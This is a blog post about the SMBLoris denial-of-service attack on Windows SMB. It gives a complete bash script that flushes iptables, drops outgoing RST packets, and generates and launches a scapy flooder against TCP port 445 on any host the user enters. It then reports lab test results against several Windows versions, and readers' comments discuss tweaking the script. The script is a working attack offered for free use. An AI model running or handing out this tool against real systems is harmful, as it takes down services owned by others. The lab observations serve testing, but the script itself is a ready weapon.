SMBLoris on Windows – tests

Last weekend some interesting news were heard from DEFCON 25 about a new SMB Denial of Service attack technically similar to the notorious Slowloris for Apache.

Please refer to the following page for more information about SMBLoris https://smbloris.com/

There was some information available from Sam Bowne Youtube post here https://www.youtube.com/watch?v=Y77er0gzQqA

I have transferred his demonstration from his video to a single script to play around with; save how you wish ….

#!/bin/bash
clear
echo "***************************************************************"
echo " MS Windows SMB Remote DOS - need access to TCP 445 "
echo " Thx to Sam Bowne & DEFCON 25 " 
echo "***************************************************************"
echo "[*] Checking if python-scapy module is installed "
python -c "import scapy"
if [ $? -ne 0 ]; then 
echo "[-] Scapy not found please run apt-get install python-scapy"
exit 0
fi
echo "[*] Scapy found "
echo "[*] Setting iptables to stop RST packets "

iptables -F 
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

echo -e "Remote Windows SMB host IP ? \c"
read ip 
echo -e "How many threads are we gonna use ? [90000 is good] : \c"
read threads

echo 'from scapy.all import *' > smb-dos.py 
echo 'import sys' >> smb-dos.py 
echo '' >> smb-dos.py
echo 'p0 = int(sys.argv[1])' >> smb-dos.py 
echo '' >> smb-dos.py
echo 'conf.L3socket' >> smb-dos.py
echo 'conf.L3socket=L3RawSocket' >> smb-dos.py
echo '' >> smb-dos.py
echo 'i = IP()' >> smb-dos.py 
echo -n 'i.dst = "' >> smb-dos.py
echo -n $ip >> smb-dos.py 
echo '"' >> smb-dos.py
echo 't = TCP()' >> smb-dos.py 
echo 't.dport = 445' >> smb-dos.py 
echo '' >> smb-dos.py
echo -n 'for p in range(p0,p0+' >> smb-dos.py 
echo -n $threads >> smb-dos.py 
echo '):' >> smb-dos.py 
echo ' print p' >> smb-dos.py 
echo ' t.sport = p' >> smb-dos.py 
echo ' t.flags = "S"' >> smb-dos.py 
echo '' >> smb-dos.py
echo ' r = sr1(i/t)' >> smb-dos.py 
echo ' rt = r[TCP]' >> smb-dos.py
echo ' t.ack = rt.seq + 1' >> smb-dos.py 
echo ' t.seq = rt.ack' >> smb-dos.py 
echo ' t.flags= "A"' >> smb-dos.py 
echo " sbss = '\x00\x01\xff\xff'" >> smb-dos.py 
echo ' send(i/t/sbss)' >> smb-dos.py 
ls -la smb-dos.py
echo '[*] Running SMB DOS against $ip' 
sleep 2
python smb-dos.py 0 & 
python smb-dos.py 1000 &
python smb-dos.py 2000 &
python smb-dos.py 3000 &
python smb-dos.py 4000 &
python smb-dos.py 5000 &
python smb-dos.py 6000 &
python smb-dos.py 7000 &
python smb-dos.py 8000 &
python smb-dos.py 9000 &

The script is pretty self-explanatory, feel free to do whatever you want with it.

Here are my test results and videos for each of the Windows platforms I have ran this script against. I was using Virtual Box in Linux with internal networking. Bear in mind that you need to access TCP 445 on the remote host for this to work, so check your firewalls ;)

Windows Server 2016 – latest patches installed

    • Memory was being slowly eaten, but after while it gets released and starts to grow again .. could have impact if more hosts were sending this attack simultaneously
    • Below you can see the video of the test performed

Windows 2010 x64  – latest patches installed

    • Same behavior observed as with Windows Server 2016; as expected.
    • Below you can see the video of the test performed

Windows 7 SP1 x64 – latest patches installed

    • Here the system came to its knees at one point, given the fact that if I would run off this attack with one more virtual machine the box would have hard times.
    • Below you can see the video of the test performed

 

Windows Server 2003 R2 x64 – whatever patches were available back then

    • Actually pretty stable during the attack :)
    • Below you can see the video the the test performed

Thats it !

P.S  I have tried against Samba on Linux … no problem so far.. but I would not be so sure .. this has a potential level of abuse .. same goes for NSF/RPC …  lets see what time brings.

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to SMBLoris on Windows – tests

  1. zimmaro says:

    hi !!!
    ALL ALWAYS thanks for Sharing!!! in the script in line :
    echo -n ‘for p in range(p0,p0+’ >> smb-dos.py after the whatch “link” of youtube-video i’ve ADD +700:
    echo -n ‘for p in range(p0,p0+700’ >> smb-dos.py
    and in my kali SEEMS to worked fine… is it correct??
    thanks again!

  2. FREE says:

    Nice Blog followd you go on with it :DD

  3. RipperFox says:

    Try this c implementation and see how many seconds your server lasts:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s